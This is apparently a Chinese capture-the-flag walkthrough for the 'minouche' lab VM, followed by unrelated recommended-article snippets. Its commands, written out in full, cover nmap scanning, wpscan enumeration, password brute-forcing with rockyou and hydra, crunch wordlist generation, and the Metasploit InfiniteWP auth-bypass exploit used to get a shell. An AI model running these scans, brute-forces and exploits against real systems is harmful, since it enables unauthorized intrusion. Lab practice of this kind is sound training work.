靶机准备

先将靶机导入虚拟机,并将网络模式改为NAT



扫描不到ip,改VirtualBox,使用桥接,并将kali也改为桥接模式



扫描ip:192.168.0.102

netdiscover -r 192.168.0.0/24192.168.0.0/24



kali:192.168.0.105

渗透测试

扫描端口

nmap -sS -sV -T5 -A -p- 192.168.0.102



开放了3个端口

查看80端口



发现是wordpress的CMS框架

再用dirb扫描,确认一下



用wpscan扫描,枚举用户

wpscan --url http://192.168.0.102 -e u,p

扫描到一个用户:kitty



尝试爆破密码

wpscan --url http://192.168.0.102 -U kitty -P /usr/share/wordlists/rockyou.txt



半天爆不出来,尝试从插件入手,用此工具扫描其插件

wpscan --url http://192.168.0.102 -e u,p --plugins-detection mixed

扫描到插件iwp-client



发现有漏洞:



使用msf搜索此漏洞进行利用

search InfiniteWP

use exploit/unix/webapp/wp_infinitewp_auth_bypass

set lhost 192.168.0.105

set rhosts 192.168.0.102

set username kitty

exploit



成功拿到shell

挖掘信息

一直退到根目录下发现有一个kitty.txt文件,cat查看



有个提示,你的密码使用美元符+猫的名字+你出生的年份不是一个好密码

用kali下自带的crunch根据提示生成字典

命令:

crunch 13 13 -t "$"Minouche19%% -o 1.txt

crunch 13 13 -t "$"Minouche20%% -o 2.txt



用hydra爆破一波

hydra -l kitty -P 2.txt ssh://192.168.0.102

爆破出密码



利用得到的密码,登录



在目录下发现user.txt,cat查看



发现还有一个压缩包:android.zip

拷贝下来解压

scp kitty@192.168.0.102:~/android.zip /root



解压完以后多了一个data里面有很多数据



搜索数据库发现一个数据库里面有东西

find . -name *.db



打开数据库工具在里面发现有一长串数据



尝试用这串数据提权



提权成功

获取root目录下的数据

minouche的更多相关文章

随机推荐

  1. springboot学习第一步

    关于springboot的介绍就不多说了,可以去百度. 默认的情况下,springboot1.4.0版本要求Java7以上和spring4.3.2以上,当然你也可以使用java1.6,只不过你需要额外 ...

  2. Linux 基础练习题

    Linux 测试 1.找出/proc/meminfo文件中以s开头的行,至少用三种方式忽略大小写 [root@localhost proc]# grep -i '^s' /proc/meminfo [ ...

  3. Dapp开发petshop——truffle官方例程

    truffle-pet-shop pet-shop是truffle的官方例程. 之前参考https://learnblockchain.cn/2018/01/12/first-dapp/的中文教程,但 ...

  4. Python 基于 TCP 传输协议的网络通信实现

    1.基础概念 什么是网络编程? 指在网络环境中,如何实现不在同一物理位置中的计算机之间进行数据通信 如果要保证数据通信顺利完成,则需要先了解如下几个概念: 1.1 协议 不同计算机内的进程之间进行数据 ...

  5. java: 程序包com.sun.media.jai.codec不存在

    Q:IDEA编译时提示"java: 程序包com.sun.media.jai.codec不存在" A:添加下面的repository到pom.xml中 <repository ...

  6. [Golang]一些书城项目中出现错误的原因和解决办法(一)

    跟着B站尚硅谷的GoWeb教程写书城项目,整理一下自己写的时候出现的错误和解决办法. 错误一:cartItem中只能加入一种书,SQL语句没有问题,但是购物车中的总金额和总数量正确: 原因:cartI ...

  7. MShadow中的表达式模板

    表达式模板是Eigen.GSL和boost.uBLAS等高性能C++矩阵库的核心技术.本文基于MXNet给出的教程文档来阐述MXNet所依赖的高性能矩阵库MShadow背后的原理. 编写高效的机器学习 ...

  8. python数据分析与挖掘实战第二版pdf-------详细代码与实现

    [书名]:PYTHON数据分析与挖掘实战 第2版[作者]:张良均,谭立云,刘名军,江建明著[出版社]:北京:机械工业出版社[时间]:2020[页数]:340[isbn]:9787111640028 学 ...

  9. 8款国内外主流商业智能BI工具分析,助你轻松选型!

    BI(Business Intelligence),即商业智能或商务智能,它是一套完整的解决方案,用来将企业中现有的数据进行有效的整合,快速准确的提供报表并提出决策依据,帮助企业做出明智的业务经营决策 ...

  10. 2020CCPC长春F. Strange Memory

    题目大意 一棵以 \(1\) 为根的 \(n(2\leq n\leq 10^5)\) 的树,每个节点 \(i\) 有权值 \(a_{i}(1\leq a_{i}\leq 10^6)\) ,求 \(\s ...